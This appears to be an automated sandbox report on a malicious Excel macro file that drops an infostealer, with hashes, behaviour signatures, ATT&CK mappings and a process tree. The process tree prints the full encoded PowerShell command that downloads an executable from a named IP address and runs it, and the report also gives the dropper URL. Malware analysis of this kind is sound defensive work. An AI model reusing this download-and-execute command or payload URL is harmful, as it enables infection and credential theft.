Overview

overview

10

Static

static

8

CSOIYQRONAGPE1.xlsm

windows7_x64

10

CSOIYQRONAGPE1.xlsm

windows10_x64

10

Analysis

  • max time kernel
    121s
  • max time network
    146s
  • platform
    windows10_x64
  • resource
    win10-en-20211014
  • submitted
    25-11-2021 16:54

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    CSOIYQRONAGPE1.xlsm

  • Size

    102KB

  • MD5

    cc1439b54aa4b3db324fb921b94870ef

  • SHA1

    33a4c8af524b8e37f290000c654d897b440fd86c

  • SHA256

    95b3882e2ba6d5f35be8c35aa3d047e41ec110eb7f8aa69af7652f1cc29a6fb7

  • SHA512

    a9fb3881f480ca8dd86bb707b8216b596f4a848e25c797c15fb6c57b517beafe1fb2ddeb2d56321faf17e049bae4147582fd4052e7e1153962c0f7a6085fd4dc

Score
10/10
collectionspywarestealer

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://18.192.215.191/team/z/CSOIYQRONAGPE1.exe

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 3 IoCs
  • Deletes itself 1 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

    spywarestealer
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • NTFS ADS 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 22 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\CSOIYQRONAGPE1.xlsm"
    1⤵
    • Deletes itself
    • Checks processor information in registry
    • Enumerates system info in registry
    • NTFS ADS
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious behavior: RenamesItself
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2716
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\Vpxldboqapmd.bat
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:872
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -win 1 -enc JABQAHIAbwBjAE4AYQBtAGUAIAA9ACAAIgBLAGgAbABtAGQAYwBjAHAAcABxAGsAcABkAHEAcgBmAGgAdwBkAGoAdwAuAGUAeABlACIAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAIgBoAHQAdABwADoALwAvADEAOAAuADEAOQAyAC4AMgAxADUALgAxADkAMQAvAHQAZQBhAG0ALwB6AC8AQwBTAE8ASQBZAFEAUgBPAE4AQQBHAFAARQAxAC4AZQB4AGUAIgAsACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAkAFAAcgBvAGMATgBhAG0AZQAiACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAKAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwAJABQAHIAbwBjAE4AYQBtAGUAIgApAA==
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2808
        • C:\Users\Admin\AppData\Roaming\Khlmdccppqkpdqrfhwdjw.exe
          "C:\Users\Admin\AppData\Roaming\Khlmdccppqkpdqrfhwdjw.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2112
          • C:\Users\Admin\AppData\Local\Temp\Khlmdccppqkpdqrfhwdjw.exe
            C:\Users\Admin\AppData\Local\Temp\Khlmdccppqkpdqrfhwdjw.exe
            5⤵
            • Executes dropped EXE
            PID:1656
          • C:\Users\Admin\AppData\Local\Temp\Khlmdccppqkpdqrfhwdjw.exe
            C:\Users\Admin\AppData\Local\Temp\Khlmdccppqkpdqrfhwdjw.exe
            5⤵
            • Executes dropped EXE
            • Accesses Microsoft Outlook profiles
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • outlook_office_path
            • outlook_win_path
            PID:1288

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials in Files

3
T1081

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Lateral Movement

Collection

Data from Local System

3
T1005

Email Collection

1
T1114

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Khlmdccppqkpdqrfhwdjw.exe.log
    MD5

    cc46a3a52a041a89732c2ec30a9651e3

    SHA1

    d2be4fb16cf40bdaf751ffb54937be0b566c3aed

    SHA256

    8b50302a8f47723cd8e4fae2f86ad219c21030f240941aa1f3c0ca08c73a70b9

    SHA512

    b7975573ddaa1fcfa4c63c7cf7ccb96680b69a2ffaf449c4729760423ecd5470185daf207c9c795d91a4631021bc331fc6a5fa834270bfbdac236262d6835fa8

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\Khlmdccppqkpdqrfhwdjw.exe
    MD5

    a28c434e703d9d0961f526f87a61109c

    SHA1

    c18ce22d993ee202d7c4e91aeda8f602a1ddb054

    SHA256

    1a58c708f0c8b203949c9f180813f7fd6665b2f7bbf6f474b39d94e3d6638a30

    SHA512

    a380bd060f69d0813fa1c1141fc960225fbeb1a13195ed7349a2d0f7d3ad72e9b37df4f2f8afe45ac8b6bf4997fdc5bac69d9ec93123a1ef5e8f0871dc29e72d

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\Khlmdccppqkpdqrfhwdjw.exe
    MD5

    a28c434e703d9d0961f526f87a61109c

    SHA1

    c18ce22d993ee202d7c4e91aeda8f602a1ddb054

    SHA256

    1a58c708f0c8b203949c9f180813f7fd6665b2f7bbf6f474b39d94e3d6638a30

    SHA512

    a380bd060f69d0813fa1c1141fc960225fbeb1a13195ed7349a2d0f7d3ad72e9b37df4f2f8afe45ac8b6bf4997fdc5bac69d9ec93123a1ef5e8f0871dc29e72d

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\Khlmdccppqkpdqrfhwdjw.exe
    MD5

    a28c434e703d9d0961f526f87a61109c

    SHA1

    c18ce22d993ee202d7c4e91aeda8f602a1ddb054

    SHA256

    1a58c708f0c8b203949c9f180813f7fd6665b2f7bbf6f474b39d94e3d6638a30

    SHA512

    a380bd060f69d0813fa1c1141fc960225fbeb1a13195ed7349a2d0f7d3ad72e9b37df4f2f8afe45ac8b6bf4997fdc5bac69d9ec93123a1ef5e8f0871dc29e72d

    Download Submit
  • C:\Users\Admin\AppData\Roaming\Khlmdccppqkpdqrfhwdjw.exe
    MD5

    a28c434e703d9d0961f526f87a61109c

    SHA1

    c18ce22d993ee202d7c4e91aeda8f602a1ddb054

    SHA256

    1a58c708f0c8b203949c9f180813f7fd6665b2f7bbf6f474b39d94e3d6638a30

    SHA512

    a380bd060f69d0813fa1c1141fc960225fbeb1a13195ed7349a2d0f7d3ad72e9b37df4f2f8afe45ac8b6bf4997fdc5bac69d9ec93123a1ef5e8f0871dc29e72d

    Download Submit
  • C:\Users\Admin\AppData\Roaming\Khlmdccppqkpdqrfhwdjw.exe
    MD5

    a28c434e703d9d0961f526f87a61109c

    SHA1

    c18ce22d993ee202d7c4e91aeda8f602a1ddb054

    SHA256

    1a58c708f0c8b203949c9f180813f7fd6665b2f7bbf6f474b39d94e3d6638a30

    SHA512

    a380bd060f69d0813fa1c1141fc960225fbeb1a13195ed7349a2d0f7d3ad72e9b37df4f2f8afe45ac8b6bf4997fdc5bac69d9ec93123a1ef5e8f0871dc29e72d

    Download Submit
  • C:\Users\Admin\Documents\Vpxldboqapmd.bat
    MD5

    eb57c3c8f7622d52e5ea78fcbcf2d9b2

    SHA1

    ec417981a3089cb8c72a78fbff71051fb8bd20d0

    SHA256

    ec93f90790e65f73486f769f4ae33aea3f099f06ae20febdffa2e91b5abb289d

    SHA512

    a6873254a3fc69cbd6234d3b6cdf780ece9ac498eecbcc9adef4c4274f5288dbc0bf5a89d016a8730569913b8c00edd93b390f0b46c3c1a6ba235c6f4200805f

    Download Submit
  • memory/872-266-0x0000000000000000-mapping.dmp
    Download
  • memory/1288-335-0x0000000004FD0000-0x00000000054CE000-memory.dmp
    Filesize

    5.0MB

    Download
  • memory/1288-327-0x00000000004204CE-mapping.dmp
    Download
  • memory/2112-311-0x0000000005860000-0x0000000005D5E000-memory.dmp
    Filesize

    5.0MB

    Download
  • memory/2112-301-0x0000000000000000-mapping.dmp
    Download
  • memory/2716-121-0x0000020276260000-0x0000020276262000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2716-122-0x0000020276260000-0x0000020276262000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2716-115-0x00007FFD922E0000-0x00007FFD922F0000-memory.dmp
    Filesize

    64KB

    Download
  • memory/2716-120-0x0000020276260000-0x0000020276262000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2716-119-0x00007FFD922E0000-0x00007FFD922F0000-memory.dmp
    Filesize

    64KB

    Download
  • memory/2716-118-0x00007FFD922E0000-0x00007FFD922F0000-memory.dmp
    Filesize

    64KB

    Download
  • memory/2716-117-0x00007FFD922E0000-0x00007FFD922F0000-memory.dmp
    Filesize

    64KB

    Download
  • memory/2716-116-0x00007FFD922E0000-0x00007FFD922F0000-memory.dmp
    Filesize

    64KB

    Download
  • memory/2808-300-0x000002583F3C6000-0x000002583F3C8000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2808-291-0x000002583F3C3000-0x000002583F3C5000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2808-290-0x000002583F3C0000-0x000002583F3C2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2808-268-0x0000000000000000-mapping.dmp
    Download